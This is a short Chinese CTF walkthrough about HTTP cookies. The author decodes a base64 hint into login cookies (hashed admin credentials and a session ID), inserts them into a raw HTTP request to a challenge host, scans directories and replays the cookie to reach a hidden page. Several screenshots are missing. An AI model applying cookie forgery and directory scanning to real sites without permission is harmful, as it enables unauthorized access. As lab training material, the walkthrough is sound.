溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

了解http字段之cookie

發(fā)布時間:2020-06-17 22:16:17 來源:網(wǎng)絡(luò) 閱讀:1252 作者:Alyoyojie 欄目:安全技術(shù)

(1)打開網(wǎng)頁鏈接,題目如下
了解http字段之cookie

(2)將提示解碼

   dXNlcl9sb2dpbj0yMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzsgcGFzc3dvcmQ9NGM
3ODM4NDVkM2E0ODk0ZmFmYTNhMWJmOGE4ZDRlN2U7IGFzZGNhc2M7IFBIUFNFU1NJRD02bzA3Z3E1a2
szOXE2NnI5NmFvMmQ4OWo3MDsgcGF0aD0v]

了解http字段之cookie

user_login=21232f297a57a5a743894a0e4a801fc3; password=4c783845d3a4894fafa3a1bf8a8d4e7e; asdcasc; PHPSESSID=6o07gq5kk39q66r96ao2d89j70; path=/

(3)我們看到提示中有path和phpsessid這兩個值,我們判定這個為cookie字段的值。于是,我們將其加入獲取的報文中看是不是可以成功

GET /login.php HTTP/1.1
Host: b73bef3389f1a266.yunyansec.com
Content-Length: 45
Cache-Control: max-age=0
Origin: http://b73bef3389f1a266.yunyansec.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://b73bef3389f1a266.yunyansec.com/index.html
Accept-Language: zh-CN,zh;q=0.9
cookie: user_login=21232f297a57a5a743894a0e4a801fc3; password=4c783845d3a4894fafa3a1bf8a8d4e7e; asdcasc; PHPSESSID=6o07gq5kk39q66r96ao2d89j70; path=/
Connection: close

了解http字段之cookie

至此,沒有什么有價值的。。。。

(4)開始上工具掃目錄
發(fā)現(xiàn)有文件

了解http字段之cookie
(5)嘗試鏈接
了解http字段之cookie
我們把包抓下來,按剛才的方法,加上cookie

了解http字段之cookie

得到了
了解http字段之cookie

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI